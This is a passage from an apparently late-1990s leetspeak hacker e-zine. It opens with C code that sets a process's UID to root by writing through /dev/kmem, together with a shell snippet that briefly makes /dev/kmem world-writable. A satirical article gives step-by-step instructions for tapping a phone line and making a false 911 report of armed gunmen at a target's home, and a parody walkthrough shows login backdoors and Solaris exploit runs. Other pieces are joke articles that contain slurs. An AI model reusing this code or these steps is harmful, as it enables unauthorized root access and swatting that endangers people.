[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps its parameters in memory, it is possible to modify the memory of the machine to change the UID of your processes.
To do so requires that /dev/kmem have read/write permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of your current process, then spawn a csh, which will inherit this UID. The following program does just that. /* If /kmem is is readable and writable, this program will change the user's UID and GID to 0. */ /* This code originally appeared in "UNIX security: A practical tutorial" with some modifications by daemon9@netcom.com */ #include #include #include #include #include #include #include #define KEYWORD "nomenclature1" struct user userpage; long address(), userlocation; int main(argc, argv, envp) int argc; char *argv[], *envp[];{ int count, fd; long where, lseek(); if(argv[1]){ /* we've got an argument, is it the keyword? */ if(!(strcmp(KEYWORD,argv[1]))){ fd=(open("/dev/kmem",O_RDWR); if(fd #include #include #define LNULL ((LDFILE *)0) long address(){ LDFILE *object; SYMENT symbol; long idx=0; object=ldopen("/unix",LNULL); if(!object){ fprintf(stderr,"Cannot open /unix.\n"); exit(50); } for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){ if(!strcmp("_u",ldgetname(object,&symbol))){ fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_val ue); ldclose(object); return(symbol.n_value); } } fprintf(stderr,"Cannot read symbol table in /unix.\n"); exit(60); } [12] Since the previous code requires /dev/kmem to be world accessable, and this is not likely a natural event, we need to take care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a discrete amount of time (say 5 minutes) and then restore the original permissions. 
You can add this source to the source in [7]: chmod 666 /dev/kmem sleep 300 # Nap for 5 minutes chmod 600 /dev/kmem # Or whatever it was before ______________________________________________________________________________ 666666666666666666666666666666666666666666666666666666666666666666666666666666 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| HAQING 10-10-321 |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: S1l3nt K0ur13r *BoW BoW BoW BoW BoW Bo ============================================================================== R0q 0n $@#$@# R4m 1t d0wn and sh0v3 it up $@# Phear th3 st33l HST of BoW az it m0ws u d0wn 0n th3 inf0rmat10n sup3rhighway. R u d0wn ?! Kuz h3r3 k0m3z th3 A-K AZKII SPR4Y $$@#!$# BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW BoW BoW BoW HaQing 10-10-321 BoW BoW by: S1l3nt K0ur13r BoW BoW BoW BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW BoW ]--]===BoW===]---- BoW BoW W4r3z 1nj3kt3d BoW BoW H1gh 0ct4n3 BoW BoW m0th3r Fuqr BoW BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW BoWBoW..........Phear BoW...........BoWBoW BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW St3p 0n3: KN0w th3 k0d3 @$$#$@ B3f0re y0u b3g1n haq1ng, it is important that y0u mem0rize the following k0de: 10-10-321 (T3n T3n Thr33 Tw0 0n3, pl3as3 ign0re th3 dazh3s) 1t fl0wz 0ff th3 t0ngue l1ke l3ach axs 0n ur fav0urite w4r3z BB$. St3p Tw0: Th1ngz y0u w1ll n33d: 1) b31g3 b0x 2) Axs t0 junct10n b0x 0f sTup1d m1ddl3 kl4zz 1d10t v1kt1m. 3) "EYE PHEAR BoW" t-sh1rt (non-0ptional) 4) eff1gy 0f Gen3 Spaff0rd to l34ve h4nging bY junct10n b0x (w4rdz 3n3my Haqrs away fr0m ur jUnct10n b0x) 5) p0zter 0f tsut0uma sh1m0m0ura t0 d00dle 0n. (opt10nal) 6) bUzh t0 h1d3 b3h1nd. 
St3p Thr33: H4ck1ng w1th 10-10-321: Sn34k 0ut t0 jUnct10n b0x sn00p3d 0ut and l0cat3d dUr1ng the pr3pat0ry w0rk 1n st3p 0ne. Pr3f3rably d0 th1z 1n th3 evening s0 y0u k4n m0ve by cl0ak 0f n1ght, und3t3cted by y0ur ch0sen enemy. G3t c0mf0rtable behind bUzhes s0 y0u are 1n a c0mf0rtable p0sition t0 d0 y0ur w0rk. If you have th3 t1me: perf0rm the relaxat10n ritual outlined in BoW #3. N0w y0u are ready $@#$#@ R3m0ve the c0ver off of the junct10n b0x and l0cate y0ur targ3t line, if y0u d0 n0t kn0w h0w to do this u are a fagg0t w4nn4b3 and y0u sh0uld st1ck t0 h4cking p0p mach1n3z. 10-10-321 1z f0r m3n $#$@# 0nce y0u have l0cat3d the target l1ne to jack into, cl1p onto it w1th the alligat0r cl1pz c0ming out of y0ur b31ge box. (see diagram b3l0w.) Y0u sh0uld n0w rece1ve d1altone 0n ur be1ge b0x, if y0u d0 n0t y0u mUzt h4ve fucked s0mething up and sh0uld g0 rent s0me anth0ny r0bbinz v1deoz. If y0u d0 receive dialt0ne y0u are n0w ready t0 perf0rm th3 d33d. D1al the f0ll0wing: 10-10-321-911 # Wh3n th3 3m3rg3ncy service answ3rz skream inc0herently int0 the ph0ne ab0ut du0dz in trenchc0atz f1r1ng semi-aut0matic weap0nz at y0u. M4ke sure t0 make reference to Gene Spaff0rd and Dale Drew, th1z will thr0w them 0ff 0f y0ur trail. Th3 emergency crews (ie: p0lice, firetrucks, narqs) sh0uld b w3ll on their way to y0ur targ3tz h0me l0ng b4 y0u even hang up. N0w it iz rec0mm3nded that y0u setup a c0nf. Dial th3 f0ll0wing: 10-10-321-700-456-1000 Y0u are n0w dialing alliance telec0nferencing wh1le diverting y0ur call thr0ugh 10-10-321. Kn0w the k0d3 @$@#$@# N0w f0ll0w the pr0mpts and mak3 sure t0 p0und in all y0ur k-k0ol friends int0 the conferenc3. Y0ur c0nvenient c0ver behind th3 bUzh3s w1ll pr0vide excell3nt vantage p0int t0 b0th enj0y ur c0nf3r3nc3 fr0m and a gr34t plac3 t0 w4tch all th3 akt10n that y0u have insured will take plac3 at y0ur enemy's h0use when the emergency crews arrive to arr3zt his a$$. If y0u g3t b0red, d00dl3 0n the pikture 0f j4pb0y shim0m0ura pr0cured in st3p tw0. 
D1agram A: .""""". | u p | <--- Haqr h1d1ng .------. <----- junction b0x 0| " |0 0ut Un1x | SW | \ o / Styl3 | Bell | b31g3 b0x --> .-. | | | | .-----|*| ***. | | .------' |#| ******* | .------' '_' ********* <-- Buzh3s 2 h1d3 | | ******** 1n --------------------------------------------*****----------------------------- W0rd @!$@# Th1z k-k0ol g-f1l3 has b33n br0ught t0 y0u by th3 nUmb3r 9, Th3 L3tt3rz B, o and W and alz0 bY th3 phrase: FUQ YOU $#@$@#$. BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW BoWBoWBoW S1l3nt K0ur13r BoWBoWBoW BoWBoWBoW [BoW] '99 BoWBoWBoW BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW ______________________________________________________________________________ 777777777777777777777777777777777777777777777777777777777777777777777777777777 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| HOW TO BE AN ELITE HAQR |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: so1o [CRH] *BoW BoW BoW BoW BoW Bo ============================================================================== m4ny 0f u k1dz 0ut th3r3 r 0bv10usly k0nfUz3d aZ t0 h0w t0 b a r34lly k00l hAkKr tYp3.. w3ll, 1'v3 d3c1d3d t0 h3lp u l4ym0rZz 0ut w1th th1z v3ry v3ry /<-r4d 4rt1kl3 0n h4ck1ng un1x syst3mz.. h0p3fUlly u w1ll f1nd 1t h3lpfUl wh1l3 expl0r1ng 0n th3 1nph() s00ph3r-h1gHw31gh. sh0uld u enk0unt3r 4ny d1ff1kUlt13z 0r h4v3 aNy kW3zt10nZ, f33l fr33 t0 k0nt4kt m3 v1a t3l3f0n3 @ 44 (0)117 985-7249. (1tz a .uK # wh1ch m4y b l0ng d1st4nc3 ph0r m4ny 0f u amer1k4n h4qrZ.. 1ph u r n0t el3et en0ugh t0 h4v3 k0d3z, f33l fr33 t0 k4ll k0ll3kt, 1 w1ll 4cc3pt ch4rg3z jU$t t0 h4v3 sUm1 t0 t4lk t0). 
telnet> o ns2.co.uk # th1s 1z my v3ry k-PhR3sh s3kUr1ty k0mp4ny... # sUm d4y w3'll h4v3 cl13ntz Trying 209.203.235.87... Connected to ns2.co.uk Escape character is '^]'. Virtual Server (saturn.exploit.net) # ch3k 0ut mY r4d h0stn4m3!@ login: so1o Password: ant10nl1n3r0x Last login on ttyp7 from dgs.dgsys.com w3lc0m3 t0 th3 jUngl3.. pl3z3 b3h4v3 uRs3lf & d0nt st34l my el1t3 w4r3z. th4nx. -- so1o % whoami so1o % /tmp/.sneaky ; n0t3: th1z bAkd00r t4k3n fr0m daemon9'z art1kl3 ; wh1ch app34rz elsewh3r3 1n th1z issu3.. h3 1z a ; f3ll0w el8 # whoami root ; z3r0-d4y!@$*)( # telnet dgs.dgsys.com ; all h4qrz b0unc3 t0 h1d3 th31r ip & l0ok k001 ; eY3 uz3 th1s s1t3 f0r m0st 0f my h4ck1ng ; 0f .m1lz etc.. f33l fr33 t0 uz3 1t 4ls0, ; th3y'll n3v3r k4tch 0n Trying 204.97.64.1... Connected to dgs.dgsys.com. Escape character is '^]'. UNIX(r) System V Release 4.0 (dgs) login: check_mate ; my k-r4d l0g1n bAkd00r.. ev3ry s1t3 eYe h4k ; eYe uz3 th3 sAm3 l0g1n b1n, th1z 1z g00d kUz ; th4t w4y ey3 d0nt g3t k0nfUz3d & stUph ; th3 alt3rnat1v3z r rshd ; 0r l0g1n aga1n . th1z 1z my fav0r1t3 ; by f4r th0. Last login: Sat May 1 12:19:33 on pts/0 root@dgs:~# ls -la /bin/login -rwx------ 1 root root 46444 May 3 1996 /bin/login root@dgs:~# ls -cl /bin/login -rwx------ 1 root root 46444 Apr 2 13:13 /bin/login ; hmm, our l0g1n bAkd00r s33mz 4 b1t l4rg3.. alz0 th3 ct1m3z r ch4ng3d. ; bUt eYe d0nt th1nk th3y'll n0t1c3... root@dgs:~# cd /dev/.../el8/\ h1dd3n/s3KrUt/z3r0-d4y/uR_g3tt1ng_th3r3/\ k33p_g01ng/alm0Zt_th3r3/wAr3z ; n0w th1z 1z wh3r3 1t g3tz a b1t k0mpl1k4t3d.. hAck1ng n3w s1t3z. ; f1rZt, u mUzt h4v3 tw0 v3ry ess3nt14l el8 x-pl0iTZz wh1ch r ; ast0und1ngly /<-r4d & overwh3lm1ng 1n th31r bUgtr4qn3zZ.. ; th3y r kn0wn aZ 'dropstat' and 'automountdexp.' ; th1z 1z h0w th3y w0rk: root@dgs:~# ./dropstat help.me.im.a.retard.and.this.is.sum.worthless.machine. that.no.one.gives.a.fuck.about.but.i.think.its.cool.to. 
hack.anything.ending.in.navy.mil rpc.statd located on port 32771 # whoami root ; s33, v3ry s1mpl3! n0w f0r aut0m0untd, th1z 1z a b1t tr1ck13r.. root@dgs:~# ./amountdexp i.own.lame.unpatched.solaris.2.5.boxes.in.the.uk Automountd attack via rpc.statd bouncing Success. ; n0w u mUzt t4k3 a s3k0nd st3p.. th3 expl01t dUz s0m3 w31rd stUph ; aNd m4k3z a r00tsh3ll h4pp3n 0r s0m3th1ng 1ph u t3ln3t t0 p0rt 1524.. root@dgs:~# telnet i.own.lame.unpatched.solaris.2.5.boxes.in.the.uk 1524 Trying 3.1.33.7... Connected to i.own.lame.unpatched.solaris.2.5.boxes.in.the.uk. Escape character is '^].' # ; el1t3 w3 r r00t1n ; th1s als0 cr3at3z sUm w31rd /tmp/bob f1l3, 1m n0t sUr3 wh4t 1tz f0r, ; bUt u k4n jUzt l34v3 1t th3r3.. n01 w1ll 3v3r n0t1c3 w3ll d00dz th4tz b4s1k4lly 4ll th3r3 1z t0 1t.. 1t v4r13z 4 b1t.. th1s wUz 4 sl1ght d3p4rtur3 fr0m th3 n0rm f0r m3 s1nc3 1 usU4lly 0nly h4k l1nux w1th my 0-d4y mountd, ftpd, and imapd w4r3z + my 0wnd/0wnd l0g1n b4kd00r, bUt th3 pr1nc1pl3z r m0stly th3 s4m3. h0p3 u f0und 1t 1nf0rm4t1v3. p34c3 0ut, so1o ______________________________________________________________________________ 888888888888888888888888888888888888888888888888888888888888888888888888888888 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| TH3 3NT3RT41NM3NT K0LUMN |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: D1str0-D4v3 [BoW/H4G1S] *BoW BoW BoW BoW BoW Bo ============================================================================== Ph1rst there w4s St4r W4r3Zz, Th3 SPA Str1kez B4ck, and R3turn 0f th3 Z3r0d4y, n0w V3lkr0ph1lm studios br1ngZz j00 the m0st 4nt1cip4t3d prequ3l th3 w0rld h4s ever s33n. s3t y0ur ph4z3rz 0n phun f0r: _______.___________. 
___ .______ / | | / \ | _ \ | (----`---| |----` / ^ \ | |_) | \ \ | | / /_\ \ | / .----) | | | / _____ \ | |\ \----. |_______/ |__| /__/ \__\ | _| `._____| ____ __ ____ ___ .______ _______ _______. \ \ / \ / / / \ | _ \ | ____| / | \ \/ \/ / / ^ \ | |_) | | |__ | (----` \ / / /_\ \ | / | __| \ \ \ /\ / / _____ \ | |\ \----.| |____.----) | \__/ \__/ /__/ \__\ | _| `._____||_______|_______/ EPISODE 0N3: THE K0URRI3R M3N4C3 "Eye Phear BoW." -- Gene Spafford "One of the year's most Recent films!" -- Leonard Maltin "You'll laugh until you stop!" -- Roger Ebert "I'd say something, but I'm dead" -- Gene Siskel "w0w. I've wasted my life." -- Dale Drew _ \\ <---- l1ght s4b3r \\ \\ _\.//|/._ ------- y0ung j3d1 k0ur13r \\ > < / \\ @ o O @ / \\ | ^ | \\ \ <_> / \\ -___- \\ ___| |___ \\ / --- \ \ \ / /|U$3 TH3 \ \ ---w4r3z dr01d o o______ / / |PH0RC3!| \ \_____oo / C3P0-d4y un1t, (o\ \______/ | | \----- ooo / w1th k-k00l BoW \_\ | | /------\ arch1tectur3!@# |_______| / | | | | \ k4n st0r3 6 |___0___| | O. oo o | terrabytez!@# /) | (\ |----------| | . | | |%%| |&| | *!@ blEeP bl0op.. | / \ | | |%%| | BoW rul3z !** | | | | | * * | | | | | | ::: | The k4st: --------- Chris G0gg4nZ as th3 y0unG LUK3 D0WNL04D3R, a y0ung k0urri3r wh0 is 1gn0r4nt 0f h1s sys0p h3r1t4ge, but h4z th3 sp4rq 1ns1d3 h1m t0 unl34sh th3 unl1m1t3d cr3d1tz th4t k4n s4v3 th3 un1v3rs3. h1z f4th3r l0st h1s l1fe wh3n Luke w4s 4 b4by dur1n4g th3 ph1rst SPA r4id... 0r s0 he th1nkZz. N1ck P0tk4y st4rz 4z th3 imph4m0us N4RQ VAD3R, th3 ev1l l34d3r 0f th3 SPA. B3nt 0n k33p1ng qu4l1ty w4rez 0ut 0f th3 h4ndz 0f th3 pir8 4ll1anc3, N4rq V4d3r w1ll st0p 4t n0th1ng t0 ph0rc3 th3 g4l4xy t0 p4y ph0r th31r 4ppz. b3l13ved t0 h4v3 been th3 1nf0rm4nt t0 th3 FBI th4t r3sult3d in th3 r4id on Luke'z f4rth3r'z cr4ck1ng gr0up, 4nd th3 f0rm1ng 0f th3 SPA. Als0 st4rr1ng G4il Th4ck3r4y 4s th3 b34t1ful Pr1nc3zz Z3r0d4ya, K3v1n M1tn1ck as 0day Want Shen0bi, 4nd 3mm4nu3l g0ldst31n as th3 pl4yful w4r3z-dr0id C3P0-D4Y. 
F34tur1ng sp3c14l 4pp34r4ncez by tsut0mu sh1m0mur4 4s Japa the Slut 4nd k3v1n P0uls3n 4s K0D4, th3 4g3d k0urr1er m4st3r and pr0vid3r 0f 3l1t3 k0d3z. The St0ry: ---------- th3 adventur3 b3g1nz......... th3 republ1k 0f th3 g4l4ct1k 0rd3r 0f k0ur13rz ass3mbl3 1n 0rd3r 2 0vrthr0w th31r w4r3z-m0ng0r1ng 0pr3ss0rz...th3 SPA. A y0ung d00dl3 b0y by th3 n4me 0f Luke Downl04der 1z k4ll3d t0 th3 c4uz bY a w1$3 0ld BoW af1l by th3 n4me 0f 0day Want Shen0bi. 0day tr41nz y0ung D0wnl04d3r 1n th3 w4yz 0f th3 ph0rc3.. th3 all-enc0mp4$$1ng energy s0urc3 th4t phl0wz thrU th3 s0ul 0f every h4rdk0r3 k0ur13r. w1th th3 ph0rc3 0n ur s1d3 u k4n d0 alm0$t anyth1ng...cr4ck err0r 29...s31ze trunkZ 1n 24 d1ffernt c0untr13z...ev4d3 b4n-k1ckz 0n #hack...g3t uR gr0upz k0py 0f t0mb r41d3r 16 0ut b4 any1 els3!@# aft3r th3 SPA/FBI r41dz 0f th3 k0ur13rz [n4m3d 'th3 cl0ne w4rs'] th3 gr0up c0uld n0 l0ng3r u$e th31r m0t b4gz t0 k4ll b04rdz 1n g3rm4ny. D0wnl04d3r w0uld b th3 l4$t h0pe.... k4n h3 phrEE th3 w4r3z 4 a gener4t10n 0f k1dz ph0rc3d 2 p4y h4rd e4rn3d c4$h 4 th31r w4r3?!@# eye d0n't kn0w du0dz buT eye h0p3 s0...st4y tun3d ph0r th1$ sur3 t0 be ep1c adventur3!@#!@# _.-'~~~~~~`-._ N4rq / || \ V4d3r / || \ "Luk3 my s0n, JoIN tH3 SPA +------> | || | 4nd y0u CaN bE MY c0-SySoP! | _______||_______ | |/ ----- \/ ----- \| Y0u W1Ll NeVeR h4v3 Th3 / (WAREZ) (0-DAY) \ cr3d1tz y0u nEeD t0 l34ch / \ ----- () ----- / \ th3 Z3r0Day 0th3rWiSe!" 
/ \ /||\ / \ / | \ /||||\ / | \ / SPA \ /||||||\ / SPA \ /_ | \o========o/ | _\ `--...__|`-._ _.-'|__...--' `' St4r W4r3z iZ k0pyr1ght 1999 1ndu$tr14l v3lkr0 4nd m4g1k ______________________________________________________________________________ 999999999999999999999999999999999999999999999999999999999999999999999999999999 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| B1W FIGHTING F0RCE: AN INTRO |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: The 0wn3d R4ng3r *BoW BoW BoW BoW BoW Bo ============================================================================== B1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1W BOW TH3 BEE 0NE D0UBLE-YEWZ BOW BOW ---[ B 1 W ]--- BOW BOWBOWBOWBOWBOWBOWBOWBOWBOWBOWBOWBOWBOW BOW BY THE 0WN3D R4NGER BOW BOWBOWBOWBOWBOWBOWBOWBOWBOWBOWBOWBOWBOW BOW W4REZ RUSTLER, BOW BOW 0UTL4W K0D3SLINGER BOW BOW H1 Y0 SPLO1TER, AWAY! BOW B1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1W INTRODUCTION: Y0Y0Y0Y0 BITCH3Z!@#$!!@!@@#! TH3 OWN3D RANGER H3R3 W1TH SOME FRESH NEWZ ON THE HOM3FR0NT ABOUT THE M0ST PH34RS0ME FIGHTING F0RCE TO HIT TH3 SC3NE S1NCE JIMMY AND BILLY L33 KICK3D EVERY0N3S ASS IN DOUBL3 DR4GON. BEFOR3 3Y3 KONTINU3, Y0U MAY HAVE N0T1CED TH4T TH1S 4RTIKL3 1S S3T FOR 40 K0LUMNZ. W3LL MY AMIGA G0T FR1ED CUZ EY3 SK0R3D T00 HIGH 0N L3MM1NGZ 4ND IT SH0+ MY F4TT3R AGNUZ CH1P. SO EYE AM PH0RC3D T0 SCR1B3 THIS ON MY C64. BUT TH4T'5 OK CUZ I 4D0R3 MY 64. ANYWAYZ, B4CK T0 TH3 B1W'Z: 1T IS W3LL KN0WN TH4T TH4T TH3 UPP3R ECH3L0NZ OF B0W AR3 PH1LL3D W1TH S00PAH-T0UGH BAD ASS THUGZ. IF U FUCK W1TH BOW, Y0U W1LL PH33L TH3 WR4TH 0F OUR "F1STZ 0F TH3 N0RTHST4R", AND F1ND TH3 B0W K0LL3KT1VE B00T V1OL4T1NG Y0' ASS IN 4 FL4SH. 
H0W3VER, MY G00D BUDD13 U4EA IS A V3RY BUSY M4N 4ND H4VING TO D1SH 0U+ VI0L3NC3 T0 TH3 L4M3 1Z 4 T1ME- C0NSUM1NG 4ND T3D10UZ T4SK. TH3 S4M3 G03Z F0R TH3 0TH3R 31337 M3MBERZ OF BOW'Z 1NN3R S4NKTUM, WHO H4V3 MUCH B3TT3R TH1NGZ T0 D0 TH4N D34L W1TH N3WB13 D0RKZ WH0 TH1NK TH3Y KAN D1S B0W 4ND L1V3 T0 T3LL TH3 T4LE. TH1S IS WH3R3 THE B1W'Z PH1T IN. TH3 B33 0N3 DOUBLE-YEWZ: TH3 B1W'Z 4R3 A CR4CK T3AM OF EL1T3 GI-J03 TYP3 MUTH4FUCK4Z W1TH M4D SK1LLZ 1N KL0SE QU4RT3RZ K0MB4T, 4ND WITH K-SHARP SWORDZ TH4T'LL KUT Y0 GREAZY B4LD-H34D3D B1TCH ASS IN TW0 B4 U KAN S4Y "EYE SH0ULD HAVE PH34RED BOW". BUT DON'T T4K3 MY W0RD PH0R 1T, CH3CK OUT TH1Z K-R4D PIC 0F TW0 T0P-S3KR1T MUSCL3-M4N M3MB3RZ 0F TH3 B1W PH1GHTING PH0RC3: ...................................... ..ELITE GIF2ASC OF S0ME B1W W4RR10RZ.. .......DRESSED IN THEIR FINERY........ ......WITH THEIR SW0RDZ OF DEWM....... .............B........................ ............RR.....B.................. ....BRRB...BW......B......B........... ...XYYYVB..X......R.....WYYYW......... ..Wt,,;iV.V.......R.....Yt+tI......... ...Y:..+VX........B.....i.,.;......... ....I,+i+YWR.....R....BRVi.;YYVR...... ...BWVV+IYIIVR..XIR.RWXVVXVXIYIVVB.... ..I, IViiVYVRBi;IWXWt, ;VY;;VVX.... .RYtt;It+IVitYXR:,IWXWWY+tYYitVVVW.... BYVWIYY;,YXVYIV.XIVRWWXVYIi+IVVXVR.... VXRYYWVtiYXVIIVB..BRRWXXi:tYVIIXVW.... XVIIWVitt:XXXVXR.......BRVXVYtiVVX.... V+IVWWI+:VXVXXB.........BXWXVtII;VR... RWBWBWVitXVIXB.........BXXWWWXYIYVVR.. B..RBBWXXVVVBR.........RXXXXXXXXXVXW.. ..WBBBXVtYVRRWB........WXXXXXXXWXXXX.. .B.BWV:;:+WWRB........BWWWWWRRWWWXXW.. ..B.BVi;;V.BBB........RRRRBBB.BWWWWWW. ................................BBBBB. R3M3MB3R TH3 S1W'Z FR0M TH3 B0MB RAP GR0UP PUBL1C 3N3MY? W3LL, THE B1W'Z 4R3 KIND4 L1K3 TH4T 3XCEPT W3 D0N'T D4NC3 4R0UND L1K3 P4NZI3Z WH1LE CHUCK- DEE R4PZ AB0UT S0M3 B1TCH W4TCH1NG A TV ST4T10N TH4T DO3SN'T EX1ST. 
KRAD!@#$@ EYE W4NN4 J01N!: B1W M3MB3RZ MUS+ G0 THRU 3XTENS1VE PHYSIK4L TR41NING B4 B31NG ADM1TT3D 1NT0 TH3 R4NKZ 0F TH1S S4KR3D 0RD3R OF W4RR10R K0URRI3RZ. 1F Y0U TH1NK U R TUFF EN0UGH T0 B3 A B1W IN1TI4T3 TH3N S3ND M3 A M3SS4GE 0N TH3 B0W BBS, 4ND I K4N ARR4NGE TH3 PR3LIMIN4RY T3STZ (N0T3: TH3 PH1RZT 0N3 INV0LV3Z 4RM WRESTL1NG D-C3LLERAT10N TRAUM4, S0 1F Y0U D0N'T TH1NK U 4R3 UP T0 TH4T T4SK, TH3N D0 N0T EV3N BOTHER). 1F YOU P4ZZ TH3N Y0U K4N ENT3R TH3 B1W TR4IN- ING PR0GR4M, WHICH INCLUDEZ R1GOR0US TR41N1NG 1N THE 0FF1C14L B1W MARTIAL 4RT, TAE-BOW. CONCLUS10N: PH34R TH3 B1W'Z!!@$!@!#$!!#@ Y0U SH4L PH33L TH31R WR4TH!@$!@! L4M3RZ K4N SUCK TH3 B1W'Z K0LL3KT1VE PENII!@!@$!#@!@!#!$$!@!@!$%%%%%! B 1 W B1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1W B 1 TH3 0WN3D R4NGER 1 W B 1 [B0W/B1W] 1 W B1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1W B O W ______________________________________________________________________________ 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| K-RAD CRYPTOGRAPHY |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: Pluvius / VKW *BoW BoW BoW BoW BoW Bo ============================================================================== Cyberpunk author Neal Stephenson recently solicited a few top notch crypto folks for some non-computer based cryptography for his new book, Cryptonomicon. For this project, he approached only two cryptographers; that sissy Bruce Schneier and our very own Velkr0 "I put the K in K0de" K0d3 W4rr10r. Now, Neal not being very a smart person, ended up using that other guy's system. However, presented here is the d00d-sp3ak low-tech cryptography system that Velkro came up with. 
INTRODUCTION: ^^^^^^^^^^^^^ Y0!@#!$$%^&^%$! L1st3n up ph3ll0w BoW du0dZz, it'z Th3 V3lkr0 K0d3 W4rr10r h3r3 w1th s0me k-r4d 0-d4y crypto inf0rmat1on th4t k4n c0m3 1n very h4ndy wh3n y0u n33d to k33p a c0mmunicat1on s3kr1t 4nd d0n't h4ve 4cc3ss t0 4 'puter. Eye k4m3 up w1th th1s syst3m ph0r Neal Stephenson ph0r h1s n3w crypt0 b00k, but th3 b4st4rd th0ught h3 w4s 2 k-r4d ph0r the 0ld k0de w4rr10r, 4nd l3ft m3 0ut 0f th3 b00k. But th4tz 0k, cuz n0w 3y3 c4n sh4re it w1th y0u 1nst34d 0f h4v1ng 3v3ry l4m3r 4nd h1s 1nbr3d uncl3 us3 th1s r4d n3w t3kn33q. S0 h3r3 y0u g0, th3 d00d-sp3ak lo-tek crypt0 syst3m, als0 kn0wn as P3P, 0r Pr3tty 31337 Pr1v4cy. -- Th3 V3lkr0 K0d3 \/\/4rr10r METHODOLOGY: ^^^^^^^^^^^^ As stated before, this system employs d00d-speak to hide messages. Take the phrase: "haY d00d!!*$& g1mm3 s0m3 k0d3z s0 th4t eYe k4n kall mie GrrrLL1e." We convert this phrase to normal english: "hey dude, give me some codes so that I can call my girlfriend." And then take the common letters in the order they appear: "haY d00d!!*$& g1mm3 s0m3 k0d3z s0 th4t eYe k4n kall mie GrrrLL1e." "hey dude, give me some codes so that I can call my girlfriend." _ _ _ _ _ _ _ _ _ _ __ _ _ ___ _ _ __ _ h y d d g e s m d s th t n all m g rl e Notice that the only letters selected are ones that appear in both the original k-rad phrase, and the resulting plain-english translation. For this system, differences in case are ignored. So in this situation, the real message is: hyddgesmdsthtnallmgrle Which just happens to be Swahili for: "Henry Hyde was the one on the grassy nole." (you can see why this message had to be heavily encrypted!@##!) Let's try some more: -------------------- Original: sM4K m3 s+00p1d!! th3r3z 4 V1ruz 1n m3 0-D4Y! Translation: smack me stupid, there is a virus in my zero-day. -- - - - - - -- - - -- - - - - sm k m s p d th r v ru n m d y Resulting Phrase: smkmspdthrvrunmdy Which is Swedish for: "the firewall can't hold up much longer. 
Let's go fishing" And lastly: ----------- Original: y0y0y0, YP 0wnz y3r ph4T azz#*%2*! p01n+ Y3r sKriPTZ @ y3R M0mma t0n1ght, BAYBEE! Translation: your attention please! The Yorkshire Posse owns your fat ass. Point your - - - -- - - - - - - - - y y p wn y r t a p n y r hacking scripts at your mother tonight, baby. - ---- - - - - - --- --- s ript y r m t n ght bab Resulting Phrase: yypwnyrtapnyrsriptyrmtnghtbab Which is Russian for: "Comrade! Pick up some vodka and a soldering iron on your way home from the brothel!" NOTES: ^^^^^^ It turns out that a keen understanding of many foreign languages is needed to effectively use d00d-speak crypto. However that is seen as a minor barrier. The use of many languages provides added flexibility to this system. Provided you have the appropriate language skills, d00d-speak crypto can be a fast and versatile way of communicating in secret, especially when computer-based crypto packages such as PGP are unavailable. -- Pluvius [BoW/ANuS/GLuE] kradweb: users.dhp.com/~pluvius ______________________________________________________________________________ 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| PHRESH WAREZ: BOWZ4P.C |BoW BoW 